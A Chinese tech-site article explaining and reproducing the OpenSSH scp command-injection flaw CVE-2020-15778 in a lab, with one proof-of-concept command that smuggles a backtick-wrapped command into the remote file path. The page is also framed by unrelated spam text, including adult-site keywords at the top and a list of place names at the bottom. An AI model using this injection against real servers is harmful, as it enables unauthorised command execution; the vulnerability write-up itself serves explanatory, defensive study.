91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

OpenSSH命令注入漏洞CVE-2020-15778該如何分析

發布時間:2021-12-28 17:19:27 來源:億速云 閱讀:186 作者:柒染 欄目:安全技術

OpenSSH命令注入漏洞CVE-2020-15778該如何分析,針對這個問題,這篇文章詳細介紹了相對應的分析和解答,希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

漏洞介紹

SCP(secure copy)是linux系統下基于ssh登錄進行安全遠程文件拷貝的命令,可以在linux之間復制文件和目錄。
OpenSSH中小于 8.3p1版本 SCP命令里存在命令注入漏洞。當將文件復制到遠程服務器時,文件路徑附加在本地scp命令的末尾,可以觸發命令注入漏洞。
攻擊者可以采用反引號(`)文件作為命令注入執行scp命令,命令將會發送到遠程服務器并執行。

影響版本
version: <=openssh-8.3p1

復現環境

攻擊機:192.168.20.101
靶機:192.168.20.102
利用場景:已知 ssh 密碼為 docker

漏洞復現:

scp cve202015778.txt docker@192.168.20.102:'`touch /tmp/cve202015778.sh`tmp'

#touch /tmp/cve202015778.sh`tmp' 單引號包裹全路徑信息
#touch /tmp/cve202015778.sh` 反引號包裹要執行的命令
#中途需要身份驗證,需要輸入對應用戶的密碼

OpenSSH命令注入漏洞CVE-2020-15778該如何分析

靶機查看信息

OpenSSH命令注入漏洞CVE-2020-15778該如何分析

關于 OpenSSH命令注入漏洞CVE-2020-15778該如何分析問題的解答就分享到這里了,希望以上內容可以對大家有一定的幫助,如果你還有很多疑惑沒有解開,可以關注億速云行業資訊頻道了解更多相關知識。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

定兴县| 焦作市| 双峰县| 宜城市| 米脂县| 洛扎县| 金阳县| 同仁县| 阿坝县| 竹山县| 建宁县| 天津市| 丹凤县| 进贤县| 林周县| 阜新市| 岑巩县| 富锦市| 永川市| 神木县| 阿拉善右旗| 镇雄县| 丹寨县| 西宁市| 财经| 襄垣县| 蒙城县| 金川县| 桂平市| 林芝县| 永德县| 乳源| 台湾省| 松潘县| 灵宝市| 固镇县| 绍兴市| 观塘区| 六枝特区| 沂南县| 正镶白旗|